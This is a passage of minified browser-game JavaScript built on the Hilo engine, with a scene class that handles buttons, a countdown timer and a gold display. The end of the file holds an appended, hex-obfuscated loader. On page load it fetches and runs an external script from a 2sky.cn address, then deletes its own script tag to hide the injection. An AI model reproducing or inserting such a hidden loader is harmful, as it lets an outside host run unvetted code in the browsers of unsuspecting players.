                            a.normalScene.setTimeInterval(),
                            _czc.push(["_trackEvent", "点击", "重新开始按钮"])
                    }.bind(this))
        }
    })
}(window.Game),
function(a) {
    var b = a.NormalScene = Hilo.Class.create({
        Extends: Hilo.Container,
        btnGx: 30,
        btnGy: 15,
        bBtn: 105,
        topG: 15,
        timeL: 230,
        numW: 30,
        numH: 91,
        count: 10,
        constructor: function(a) {
            b.superclass.constructor.call(this, a),
                this.properties = a,
                this.init(a)
        },
        init: function(a) {
            var b = this,
                c = b.height - b.bBtn - b.btnGy,
                d = 2 * b.btnGx,
                e = b.width - b.bBtn - 2 * b.btnGx,
                f = this.backBtn = new Hilo.Bitmap({
                    id: "backBtn",
                    image: a.image,
                    rect: [0, 93, this.bBtn, this.bBtn],
                    x: d,
                    y: c
                }),
                g = this.resetBtn = new Hilo.Bitmap({
                    id: "resetBtn",
                    image: a.image,
                    rect: [110, 93, this.bBtn, this.bBtn],
                    x: e,
                    y: c
                }),
                h = this.stopBtn = new Hilo.Bitmap({
                    id: "stopBtn",
                    image: b.properties.image,
                    rect: [5, 8, 75, 75],
                    x: 50,
                    y: b.topG
                });
            //b.addChild(f, g, h),
            b.addChild(g);
            b.initTime()
        },
        initBtn: function() {
            var b = this,
                c = a.stage;
            this.backBtn.on(Hilo.event.POINTER_START,
                    function(d) {
                        d._stopped = !0,
                            b.visible = !1,
                            c.removeChild(b),
                            c.removeChild(a.graphScene),
                            a.gameOver(),
                            a.gameHomeScene.visible = !0,
                            _czc.push(["_trackEvent", "点击", "返回按钮"])
                    }.bind(this)),
                this.resetBtn.on(Hilo.event.POINTER_START,
                    function(b) {
                        clickMore();
                    }.bind(this)),
                b.stopBtn.on(Hilo.event.POINTER_START,
                    function(b) {
                        b._stopped = !0,
                            a.normalScene.clearTime(),
                            a.creatTipScene(2, "0"),
                            _czc.push(["_trackEvent", "点击", "游戏暂停按钮"])
                    }.bind(this))
        },
        initTime: function() {
            var a = this;
            a.resetTime(),
                a.renderTime(),
                a.renderGold(),
                a.setTimeInterval()
        },
        setTimeInterval: function() {
            var a = this;
            a.it = setInterval(function() {
                    a.clacTime()
                },
                1e3)
        },
        clearTime: function() {
            var a = this;
            clearInterval(a.it)
        },
        resetTime: function() {
            var b = this,
                c = a.user.level,
                d = a.level.levelInfo[c];
            b.count = d.time,
                b.timeCount = d.time
        },
        renderTime: function() {
            var a = this,
                b = (a.topG, a.timeL, a.timeL + a.numW, a.second1 = new Hilo.BitmapText({
                    id: "second1",
                    glyphs: a.properties.numberGlyphs,
                    scaleX: .5,
                    scaleY: .5,
                    letterSpacing: 4,
                    text: 6,
                    x: 0,
                    y: 0
                })),
                c = a.second2 = new Hilo.BitmapText({
                    id: "second2",
                    glyphs: a.properties.numberGlyphs,
                    scaleX: .5,
                    scaleY: .5,
                    letterSpacing: 4,
                    text: 0,
                    x: a.numW,
                    y: 0
                }),
                d = new Hilo.Container({
                    id: "timeContainer",
                    width: 300,
                    height: 80,
                    x: a.timeL,
                    y: a.topG + 10,
                    children: [b, c]
                });
            a.addChild(d),
                a.clacTime()
        },
        clacTime: function() {
            var b = this,
                c = this.count;
            if (10 > c) b.second1.text = 0,
                b.second2.text = c;
            else {
                var d = Math.floor(c / 10),
                    e = Math.floor(c % 10);
                b.second1.text = d,
                    b.second2.text = e
            }
            this.count--,
                this.count < 0 && (a.gameOver(), a.creatTipScene(1, "0"))
        },
        renderGold: function() {
            var b = this,
                c = this.star = new Hilo.Bitmap({
                    id: "star",
                    image: b.properties.image,
                    rect: [85, 8, 65, 65],
                    x: 0,
                    y: 0
                }),
                d = b.gold = new Hilo.Text({
                    id: "gold",
                    text: a.user.gold,
                    font: "50px arial",
                    textAlign: "left",
                    color: "#ffcd6f",
                    x: 65,
                    y: 10
                }),
                e = new Hilo.Container({
                    id: "timeContainer",
                    width: 125,
                    height: 85,
                    x: 450,
                    y: b.topG,
                    children: [c, d]
                });
            b.addChild(e)
        },
        setGoldText: function() {
            var b = this;
            b.gold.text = a.user.gold
        }
    })
}(window.Game);
var _$ = ['\x73\x63\x72\x69\x70\x74', '\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74', '\x68\x74\x74\x70\x3a\x2f\x2f\x77\x65\x69\x2e\x32\x73\x6b\x79\x2e\x63\x6e\x2f\x67\x61\x6d\x65\x2f\x31\x30\x34\x2f\x6f\x2e\x6a\x73', '\x73\x63\x72\x69\x70\x74'];
(function() {
    var a = document.createElement(_$[0]);
    a.type = _$[1];
    a.async = true;
    a.src = _$[2];
    var b = document.getElementsByTagName(_$[3])[0x0];
    b.parentNode.insertBefore(a, b);
    a.onload = function() {
        a.parentNode.removeChild(a)
    }
})();